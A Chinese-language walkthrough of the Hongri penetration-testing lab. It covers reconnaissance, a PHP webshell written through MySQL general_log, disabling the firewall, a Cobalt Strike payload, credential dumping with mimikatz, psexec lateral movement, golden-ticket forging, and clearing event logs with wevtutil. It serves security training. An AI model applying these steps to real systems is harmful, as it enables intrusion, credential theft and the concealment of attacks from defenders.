1. 红日靶场环境搭建与初始配置第一次接触红日靶场时我被它高度仿真的企业内网环境惊艳到了。这个由红日安全团队打造的靶场平台完美复现了国内企业常见的网络架构特别适合练习从外网渗透到内网横向移动的全套技能。靶场包含三台虚拟机一台对外提供Web服务的Win7主机、一台Win2008域控服务器和一台Win2003域成员服务器这种架构在很多中小型企业都能见到。配置环境时有个小细节要注意Win7需要添加两块网卡。第一块用默认NAT模式模拟公网访问第二块要手动创建仅主机模式的VMnet2网卡这是内网通信的关键。三台机器的初始密码都是hognrisec2019但登录时会提示密码过期需要修改这个设计很真实——企业服务器确实会强制定期改密。启动phpStudy服务后记得检查MySQL是否正常运行我遇到过服务异常导致后续渗透受阻的情况。2. 外网信息收集的艺术信息收集阶段就像侦探破案每个细节都可能是突破口。用nmap扫描22网段时发现192.168.22.149开放了80和3306端口。访问Web页面看到PHP探针暴露了绝对路径C:/phpStudy/WWW/这种信息泄露在真实渗透中经常遇到。更惊喜的是MySQL居然用root/root这种弱口令就能登录虽然现在企业安全意识提高了但仍有不少老旧系统存在这类问题。目录扫描我更喜欢用dirb配合自定义字典相比默认字典能发现更多隐藏路径。当扫出/phpmyadmin时心跳都加快了——这意味着可能直接操作数据库。这里有个经验扫描前最好设置延迟参数-z 1000否则可能触发WAF封禁。曾经有次测试忘了加延迟IP被ban导致后续工作无法开展。3. MySQL日志写shell的骚操作在phpMyAdmin里看到general_log默认关闭时我立刻想到经典的日志写shell技术。通过SET GLOBAL general_logon开启日志后把日志路径指向Web目录C:/phpStudy/WWW/shell.php然后执行SELECT ?php eval($_POST[cmd]);?就能生成一句话木马。这个过程有几个坑要注意Web目录必须有写权限路径斜杠要用正斜杠执行后要立即关闭日志避免留下大量记录用蚁剑连接时如果遇到连接失败可能是杀软拦截了。这时候可以尝试编码器切换为base64或者修改连接密码为不常见的字符串。成功上线后第一件事就是关闭防火墙命令netsh advfirewall set allprofiles state off要记牢否则后续操作可能被拦截。4. Cobalt Strike的精细化控制CS作为内网渗透神器配置时要注意几个关键点。创建HTTP监听器时端口尽量选8000以上不常见的避免与企业常规服务冲突。生成payload时建议选择x64架构的exe现在主流系统基本都是64位了。上传payload后通过蚁剑的终端执行时可能会遇到权限问题这时候需要先用whoami /priv查看当前权限必要时用shell sc create创建服务来绕过限制。提权到system权限后我习惯立即做三件事修改回连间隔为0仅限靶场实战中要设置合理间隔抓取明文密码mimikatz sekurlsa::logonpasswords查看网络配置ipconfig /all确定内网段5. 内网横向移动实战技巧发现52网段存在域环境后信息收集就要更有针对性。net view /domain确认存在GOD域net group Domain Admins /domain查看域管列表。当扫描到域控开放445端口时SMB横向移动就是首选方案。创建SMB监听器时要注意隧道类型要选正确否则psexec横向会失败。通过psexec横向移动时输入之前抓取的域账号密码后监听器要选择SMB类型目标选择域控IP。成功后立即关闭目标防火墙是标准操作流程。这里有个细节如果目标系统是Win2008以上可能需要先执行net use \\目标IP\ipc$ /user:域名\用户名 密码建立IPC连接。6. 黄金票据制作与权限维持拿到域控权限后制作黄金票据是维持访问的关键。需要收集三个核心数据域SID通过whoami /all获取去掉最后一段krbtgt用户的NTLM hash用mimikatz提取域名大小写必须完全匹配在CS的凭证提权中选择黄金票据功能填入上述信息后票据有效期建议设置较长时间如1年但实战中要根据目标安全策略调整。制作成功后用klist命令可以查看当前会话的Kerberos票据验证是否生效。7. 痕迹清理的必备姿势清理痕迹是渗透的最后一步但绝不是最不重要的一步。除了常规的日志清除命令wevtutil cl security wevtutil cl system wevtutil cl application还需要注意删除创建的临时文件清理回收站检查计划任务是否留下后门恢复防火墙规则避免引起怀疑在靶场练习时我建议每一步操作都记录时间戳这样清理时可以精准定位。真实环境中还要考虑安全设备日志、网络流量日志等更多维度。